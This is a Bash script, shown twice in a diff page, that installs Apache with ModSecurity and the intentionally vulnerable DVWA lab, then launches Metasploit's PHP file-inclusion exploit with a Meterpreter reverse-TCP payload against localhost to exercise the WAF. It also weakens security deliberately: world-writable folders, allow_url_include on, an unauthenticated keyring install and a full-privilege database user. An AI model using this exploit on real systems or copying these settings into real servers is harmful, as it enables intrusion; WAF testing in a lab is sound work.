unk9vvn · October 21, 2020 23:33
diff --git a/ModSecurity-DEB.sh b/ModSecurity-DEB.sh
 #!/bin/bash
 # unk9vvn@avi:~$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh
 # v10
 # Debian-Kali
 # Switch off WAF
 # unk9vvn@avi:~$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart



 RED='\e[1;31m%s\e[0m\n'
 GREEN='\e[1;32m%s\e[0m\n'
 YELLOW='\e[1;33m%s\e[0m\n'
 BLUE='\e[1;34m%s\e[0m\n'
 MAGENTO='\e[1;35m%s\e[0m\n'
 CYAN='\e[1;36m%s\e[0m\n'
 WHITE='\e[1;37m%s\e[0m\n'


 if [ "$(id -u)" != "0" ];then
 	printf "$RED"		"[X] Please run as RooT ..."
 	printf "$GREEN"		"sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh"
 	exit 0
 fi


 MODINSTALL=/etc/modsecurity/
 DVWAINSTALL=/var/www/html/DVWA/
 METASPLOIT=/usr/share/metasploit-framework/
 DEBIAN=$(cat /etc/apt/sources.list|grep -o "deb http://ftp.us.debian.org/debian/ jessie main")
 UBUNTU=$(cat /etc/apt/sources.list|grep -o "deb http://http.kali.org/kali kali-rolling main non-free contrib")


 if [ "$UBUNTU" != "deb http://http.kali.org/kali kali-rolling main non-free contrib" ]; then
 	echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
 	echo "# deb-src http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
 	apt-get -y --allow-unauthenticated install kali-archive-keyring
 	apt-get update
 fi

 if [ "$DEBIAN" != "deb http://ftp.us.debian.org/debian/ jessie main" ]; then
 	echo " " >> /etc/apt/sources.list
 	echo "deb http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
 	echo "# deb-src http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
 	echo " " >> /etc/apt/sources.list
 	echo "deb http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
 	echo "# deb-src http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
 	echo " " >> /etc/apt/sources.list
 	echo "deb http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
 	echo "# deb-src http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
 	apt-get update
 fi

 if [ ! -d "$MODINSTALL" ]; then
 	apt-get update;apt-get install -y git apache2 libapache2-modsecurity libapache2-mod-security2
 	cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
 	sed -i "s#SecRuleEngine DetectionOnly#SecRuleEngine On#g" /etc/modsecurity/modsecurity.conf
 	rm -rf /usr/share/modsecurity-crs
 	git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git /usr/share/modsecurity-crs
 	mv /usr/share/modsecurity-crs/crs-setup.conf.example /usr/share/modsecurity-crs/crs-setup.conf
 	echo """
 <IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity

        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf

        # Include OWASP ModSecurity CRS rules if installed
        IncludeOptional /usr/share/modsecurity-crs/*.conf
        IncludeOptional /usr/share/modsecurity-crs/rules/*.conf
 </IfModule>
 """ > /etc/apache2/mods-enabled/security2.conf
 	chmod 755 /etc/apache2/mods-enabled/security2.conf
 	rm /var/www/html/index.html
 fi

 if [ ! -d "$DVWAINSTALL" ]; then
 	apt-get update;apt-get install -y wget unzip mariadb-server php php7.3-mysql php-gd libapache2-mod-php
 	service mysql start
 	wget https://github.com/ethicalhack3r/DVWA/archive/master.zip -O /tmp/master.zip
 	unzip /tmp/master.zip -d /var/www/html/
 	rm /tmp/master.zip
 	mv /var/www/html/DVWA-master /var/www/html/DVWA
 	mv /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php
 	chmod 777 /var/www/html/DVWA/hackable/uploads
 	chmod 777 /var/www/html/DVWA/config
 	chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
 	sed -i "s#allow_url_include = Off#allow_url_include = On#g" /etc/php/7.3/apache2/php.ini
 	sed -i "s#allow_url_fopen = Off#allow_url_fopen = On#g" /etc/php/7.3/apache2/php.ini
 	sed -i "s#= 'p@ssw0rd'#= '0098'#g" /var/www/html/DVWA/config/config.inc.php
 	sed -i "s#'db_database' ] = 'dvwa';#'db_database' ] = 'dvwa_db';#g" /var/www/html/DVWA/config/config.inc.php
 	sed -i "s#'db_user' ]     = 'root';#'db_user' ]     = 'dvwa';#g" /var/www/html/DVWA/config/config.inc.php
 	sed -i "s#= 'impossible';#= 'low';#g" /var/www/html/DVWA/config/config.inc.php
 	mysql -u root -p -h localhost -e "DROP database dvwa_db;DROP USER 'dvwa'@'localhost';"
 	mysql -u root -p -h localhost -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY '0098';GRANT ALL PRIVILEGES ON *.* TO 'dvwa'@'localhost';FLUSH PRIVILEGES;"
 	mysql -u dvwa -p0098 -e "create database if not exists dvwa_db;"
 	service mysql restart;service apache2 restart
 	if [[ -f "/tmp/unk9.vvn" ]]; then
 		rm /tmp/unk9.vvn
 	fi
 	CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/setup.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
 	curl -s -b /tmp/unk9.vvn -d "create_db=Create+%2F+Reset+Database&user_token=${CSRF}" "127.0.0.1/DVWA/setup.php"
 fi

 if [ ! -d "$METASPLOIT" ]; then
 	apt-get install -y metasploit-framework;service postgresql start;msfdb init
 fi


 reset;clear
 printf "$GREEN"   "                            --/osssssssssssso/--                    "
 printf "$GREEN"   "                        -+sss+-+--os.yo:++/.o-/sss+-                "
 printf "$GREEN"   "                     /sy+++-.h.-dd++m+om/s.h.hy/:+oys/              "
 printf "$GREEN"   "                  .sy/// h/h-:d-y:/+-/+-+/-s/sodooh:///ys.          "
 printf "$GREEN"   "                -ys-ss/:y:so-/osssso++++osssso+.oo+/s-:o.sy-        "
 printf "$GREEN"   "              -ys:oossyo/+oyo/:-:.-:.:/.:/-.-:/syo/+/s+:oo:sy-      "
 printf "$GREEN"   "             /d/:-soh/-+ho-.:::--:- .os: -:-.:-/::sy+:+ysso+:d/     "
 printf "$GREEN"   "            sy-..+oo-+h:--:..hy+y/  :s+.  /y/sh..:/-:h+-oyss:.ys    "
 printf "$WHITE"   "           ys :+oo/:d/   .m-yyyo/- - -:   .+oyhy-N.   /d::yosd.sy   "
 printf "$WHITE"   "          oy.++++//d.  ::oNdyo:     .--.     :oyhN+-:  .d//s//y.ys  "
 printf "$WHITE"   "         :m-y+++//d-   dyyy++::-. -.o.-+.- .-::/+hsyd   -d/so+++.m: "
 printf "$WHITE"   "        -d/-/+++.m-  /.ohso- ://:///++++///://:  :odo.+  -m.syoo:/d-"
 printf "$WHITE"   "        :m-+++y:y+   smyms-   -//+/-ohho-/+//-    omsmo   +y s+oy-m:"
 printf "$WHITE"   "        sy:+++y-N-  -.dy+:...-- :: ./hh/. :: --...//hh.:  -N-o+/:-so"
 printf "$WHITE"   "        yo-///s-m   odohd.-.--:/o.-+/::/+-.o/:--.--hd:ho   m-s+++-+y"
 printf "$WHITE"   "        yo::/+o-m   -yNy/:  ...:+s.//:://.s+:...  :/yNs    m-h++++oy"
 printf "$WHITE"   "        oy/hsss-N-  oo:oN-   .-o.:ss:--:ss:.o-.   -My-oo  -N-o+++.so"
 printf "$WHITE"   "        :m :++y:y+   sNMy+: -+/:.--:////:--.:/+- -+hNNs   +y-o++o-m:"
 printf "$WHITE"   "        -d/::+o+.m-  -:/+ho:.       -//-       ./sdo::-  -m-o++++/d-"
 printf "$WHITE"   "         :m-yo++//d- -ommMo//        -:        +oyNhmo- -d//s+++-m: "
 printf "$WHITE"   "          oy /o++//d.  -::/oMss-   -+++s     :yNy+/:   .d//y+---ys  "
 printf "$WHITE"   "           ys--+o++:d/ -/sdmNysNs+/./-//-//hNyyNmmy+- /d-+y--::sy   "
 printf "$RED"     "            sy:..ooo-+h/--.-//odm/hNh--yNh+Ndo//-./:/h+-so+:+/ys    "
 printf "$RED"     "             /d-o.ssy+-+yo:/:/:-:+sho..ohs/-:://::oh+.h//syo-d/     "
 printf "$RED"     "              -ys-oosyss:/oyy//::..-.--.--:/.//syo+-ys//o/.sy-      "
 printf "$RED"     "                -ys.sooh+d-s:+osssysssosssssso:/+/h:/yy/.sy-        "
 printf "$RED"     "                  .sy/:os.h--d/o+-/+:o:/+.+o:d-y+h-o+-+ys.          "
 printf "$RED"     "                     :sy+:+ s//sy-y.-h-m/om:s-y.++/+ys/             "
 printf "$RED"     "                        -+sss+/o/ s--y.s+/:++-+sss+-                "
 printf "$RED"     "                            --/osssssssssssso/--                    "
 printf "$BLUE"    "                                  Unk9vvN                           "
 printf "$YELLOW"  "                            https://t.me/Unk9vvN                    "
 printf "$CYAN"    "                              ModSecurity-DEB                       "
 printf "\n\n"


 if [[ -f "/tmp/unk9.vvn" ]]; then
 	rm /tmp/unk9.vvn
 fi

 service postgresql start;service apache2 start;service mysql start
 CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
 SESSIONID=$(grep PHPSESSID /tmp/unk9.vvn | awk -F ' ' '{print $7}')
 curl -s -b /tmp/unk9.vvn -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "127.0.0.1/DVWA/login.php"
 echo """
 sysinfo
 """ > /tmp/autolinux.rc
 echo """
 use unix/webapp/php_include
 set PAYLOAD php/meterpreter/reverse_tcp
 set RHOSTS 127.0.0.1
 set LHOST 127.0.0.1
 set PATH /DVWA/vulnerabilities/fi
 set PHPURI /?page=XXpathXX
 set HEADERS \"Cookie: security=low; security_level=0; PHPSESSID="$SESSIONID"\"
 set AutoRunScript /tmp/autolinux.rc
 set EnableStageEncoding true
 set PayloadUUIDTracking true
 run -j
 """ > /tmp/meterpreter.rc
 msfconsole -qr /tmp/meterpreter.rc > /dev/null &
 printf "\n\n"
 printf "$RED"	"	[*] ModSecurity on Activated..."
 printf "$RED"	"	[*] Attcking LFI with Metasploit..."
 printf "$RED"	"	[*] Enable Apache Log Monitor..."
 printf "\n\n"
 tail -f /var/log/apache2/error.log
 rm -r /tmp/unk9.vvn /tmp/meterpreter.rc /tmp/autolinux.rc
	#!/bin/bash
	# unk9vvn@avi:~$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh
	# v10
	# Debian-Kali
	# Switch off WAF
	# unk9vvn@avi:~$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart



	RED='\e[1;31m%s\e[0m\n'
	GREEN='\e[1;32m%s\e[0m\n'
	YELLOW='\e[1;33m%s\e[0m\n'
	BLUE='\e[1;34m%s\e[0m\n'
	MAGENTO='\e[1;35m%s\e[0m\n'
	CYAN='\e[1;36m%s\e[0m\n'
	WHITE='\e[1;37m%s\e[0m\n'


	if [ "$(id -u)" != "0" ];then
	printf "$RED" "[X] Please run as RooT ..."
	printf "$GREEN" "sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh"
	exit 0
	fi


	MODINSTALL=/etc/modsecurity/
	DVWAINSTALL=/var/www/html/DVWA/
	METASPLOIT=/usr/share/metasploit-framework/
	DEBIAN=$(cat /etc/apt/sources.list\|grep -o "deb http://ftp.us.debian.org/debian/ jessie main")
	UBUNTU=$(cat /etc/apt/sources.list\|grep -o "deb http://http.kali.org/kali kali-rolling main non-free contrib")


	if [ "$UBUNTU" != "deb http://http.kali.org/kali kali-rolling main non-free contrib" ]; then
	echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
	echo "# deb-src http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
	apt-get -y --allow-unauthenticated install kali-archive-keyring
	apt-get update
	fi

	if [ "$DEBIAN" != "deb http://ftp.us.debian.org/debian/ jessie main" ]; then
	echo " " >> /etc/apt/sources.list
	echo "deb http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
	echo "# deb-src http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
	echo " " >> /etc/apt/sources.list
	echo "deb http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
	echo "# deb-src http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
	echo " " >> /etc/apt/sources.list
	echo "deb http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
	echo "# deb-src http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
	apt-get update
	fi

	if [ ! -d "$MODINSTALL" ]; then
	apt-get update;apt-get install -y git apache2 libapache2-modsecurity libapache2-mod-security2
	cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
	sed -i "s#SecRuleEngine DetectionOnly#SecRuleEngine On#g" /etc/modsecurity/modsecurity.conf
	rm -rf /usr/share/modsecurity-crs
	git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git /usr/share/modsecurity-crs
	mv /usr/share/modsecurity-crs/crs-setup.conf.example /usr/share/modsecurity-crs/crs-setup.conf
	echo """
	<IfModule security2_module>
	# Default Debian dir for modsecurity's persistent data
	SecDataDir /var/cache/modsecurity

	# Include all the *.conf files in /etc/modsecurity.
	# Keeping your local configuration in that directory
	# will allow for an easy upgrade of THIS file and
	# make your life easier
	IncludeOptional /etc/modsecurity/*.conf

	# Include OWASP ModSecurity CRS rules if installed
	IncludeOptional /usr/share/modsecurity-crs/*.conf
	IncludeOptional /usr/share/modsecurity-crs/rules/*.conf
	</IfModule>
	""" > /etc/apache2/mods-enabled/security2.conf
	chmod 755 /etc/apache2/mods-enabled/security2.conf
	rm /var/www/html/index.html
	fi

	if [ ! -d "$DVWAINSTALL" ]; then
	apt-get update;apt-get install -y wget unzip mariadb-server php php7.3-mysql php-gd libapache2-mod-php
	service mysql start
	wget https://github.com/ethicalhack3r/DVWA/archive/master.zip -O /tmp/master.zip
	unzip /tmp/master.zip -d /var/www/html/
	rm /tmp/master.zip
	mv /var/www/html/DVWA-master /var/www/html/DVWA
	mv /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php
	chmod 777 /var/www/html/DVWA/hackable/uploads
	chmod 777 /var/www/html/DVWA/config
	chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
	sed -i "s#allow_url_include = Off#allow_url_include = On#g" /etc/php/7.3/apache2/php.ini
	sed -i "s#allow_url_fopen = Off#allow_url_fopen = On#g" /etc/php/7.3/apache2/php.ini
	sed -i "s#= 'p@ssw0rd'#= '0098'#g" /var/www/html/DVWA/config/config.inc.php
	sed -i "s#'db_database' ] = 'dvwa';#'db_database' ] = 'dvwa_db';#g" /var/www/html/DVWA/config/config.inc.php
	sed -i "s#'db_user' ] = 'root';#'db_user' ] = 'dvwa';#g" /var/www/html/DVWA/config/config.inc.php
	sed -i "s#= 'impossible';#= 'low';#g" /var/www/html/DVWA/config/config.inc.php
	mysql -u root -p -h localhost -e "DROP database dvwa_db;DROP USER 'dvwa'@'localhost';"
	mysql -u root -p -h localhost -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY '0098';GRANT ALL PRIVILEGES ON . TO 'dvwa'@'localhost';FLUSH PRIVILEGES;"
	mysql -u dvwa -p0098 -e "create database if not exists dvwa_db;"
	service mysql restart;service apache2 restart
	if [[ -f "/tmp/unk9.vvn" ]]; then
	rm /tmp/unk9.vvn
	fi
	CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/setup.php" \| awk -F 'value=' '/user_token/ {print $2}' \| cut -d "'" -f2)
	curl -s -b /tmp/unk9.vvn -d "create_db=Create+%2F+Reset+Database&user_token=${CSRF}" "127.0.0.1/DVWA/setup.php"
	fi

	if [ ! -d "$METASPLOIT" ]; then
	apt-get install -y metasploit-framework;service postgresql start;msfdb init
	fi


	reset;clear
	printf "$GREEN" " --/osssssssssssso/-- "
	printf "$GREEN" " -+sss+-+--os.yo:++/.o-/sss+- "
	printf "$GREEN" " /sy+++-.h.-dd++m+om/s.h.hy/:+oys/ "
	printf "$GREEN" " .sy/// h/h-:d-y:/+-/+-+/-s/sodooh:///ys. "
	printf "$GREEN" " -ys-ss/:y:so-/osssso++++osssso+.oo+/s-:o.sy- "
	printf "$GREEN" " -ys:oossyo/+oyo/:-:.-:.:/.:/-.-:/syo/+/s+:oo:sy- "
	printf "$GREEN" " /d/:-soh/-+ho-.:::--:- .os: -:-.:-/::sy+:+ysso+:d/ "
	printf "$GREEN" " sy-..+oo-+h:--:..hy+y/ :s+. /y/sh..:/-:h+-oyss:.ys "
	printf "$WHITE" " ys :+oo/:d/ .m-yyyo/- - -: .+oyhy-N. /d::yosd.sy "
	printf "$WHITE" " oy.++++//d. ::oNdyo: .--. :oyhN+-: .d//s//y.ys "
	printf "$WHITE" " :m-y+++//d- dyyy++::-. -.o.-+.- .-::/+hsyd -d/so+++.m: "
	printf "$WHITE" " -d/-/+++.m- /.ohso- ://:///++++///://: :odo.+ -m.syoo:/d-"
	printf "$WHITE" " :m-+++y:y+ smyms- -//+/-ohho-/+//- omsmo +y s+oy-m:"
	printf "$WHITE" " sy:+++y-N- -.dy+:...-- :: ./hh/. :: --...//hh.: -N-o+/:-so"
	printf "$WHITE" " yo-///s-m odohd.-.--:/o.-+/::/+-.o/:--.--hd:ho m-s+++-+y"
	printf "$WHITE" " yo::/+o-m -yNy/: ...:+s.//:://.s+:... :/yNs m-h++++oy"
	printf "$WHITE" " oy/hsss-N- oo:oN- .-o.:ss:--:ss:.o-. -My-oo -N-o+++.so"
	printf "$WHITE" " :m :++y:y+ sNMy+: -+/:.--:////:--.:/+- -+hNNs +y-o++o-m:"
	printf "$WHITE" " -d/::+o+.m- -:/+ho:. -//- ./sdo::- -m-o++++/d-"
	printf "$WHITE" " :m-yo++//d- -ommMo// -: +oyNhmo- -d//s+++-m: "
	printf "$WHITE" " oy /o++//d. -::/oMss- -+++s :yNy+/: .d//y+---ys "
	printf "$WHITE" " ys--+o++:d/ -/sdmNysNs+/./-//-//hNyyNmmy+- /d-+y--::sy "
	printf "$RED" " sy:..ooo-+h/--.-//odm/hNh--yNh+Ndo//-./:/h+-so+:+/ys "
	printf "$RED" " /d-o.ssy+-+yo:/:/:-:+sho..ohs/-:://::oh+.h//syo-d/ "
	printf "$RED" " -ys-oosyss:/oyy//::..-.--.--:/.//syo+-ys//o/.sy- "
	printf "$RED" " -ys.sooh+d-s:+osssysssosssssso:/+/h:/yy/.sy- "
	printf "$RED" " .sy/:os.h--d/o+-/+:o:/+.+o:d-y+h-o+-+ys. "
	printf "$RED" " :sy+:+ s//sy-y.-h-m/om:s-y.++/+ys/ "
	printf "$RED" " -+sss+/o/ s--y.s+/:++-+sss+- "
	printf "$RED" " --/osssssssssssso/-- "
	printf "$BLUE" " Unk9vvN "
	printf "$YELLOW" " https://t.me/Unk9vvN "
	printf "$CYAN" " ModSecurity-DEB "
	printf "\n\n"


	if [[ -f "/tmp/unk9.vvn" ]]; then
	rm /tmp/unk9.vvn
	fi

	service postgresql start;service apache2 start;service mysql start
	CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/login.php" \| awk -F 'value=' '/user_token/ {print $2}' \| cut -d "'" -f2)
	SESSIONID=$(grep PHPSESSID /tmp/unk9.vvn \| awk -F ' ' '{print $7}')
	curl -s -b /tmp/unk9.vvn -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "127.0.0.1/DVWA/login.php"
	echo """
	sysinfo
	""" > /tmp/autolinux.rc
	echo """
	use unix/webapp/php_include
	set PAYLOAD php/meterpreter/reverse_tcp
	set RHOSTS 127.0.0.1
	set LHOST 127.0.0.1
	set PATH /DVWA/vulnerabilities/fi
	set PHPURI /?page=XXpathXX
	set HEADERS \"Cookie: security=low; security_level=0; PHPSESSID="$SESSIONID"\"
	set AutoRunScript /tmp/autolinux.rc
	set EnableStageEncoding true
	set PayloadUUIDTracking true
	run -j
	""" > /tmp/meterpreter.rc
	msfconsole -qr /tmp/meterpreter.rc > /dev/null &
	printf "\n\n"
	printf "$RED" " [*] ModSecurity on Activated..."
	printf "$RED" " [*] Attcking LFI with Metasploit..."
	printf "$RED" " [*] Enable Apache Log Monitor..."
	printf "\n\n"
	tail -f /var/log/apache2/error.log
	rm -r /tmp/unk9.vvn /tmp/meterpreter.rc /tmp/autolinux.rc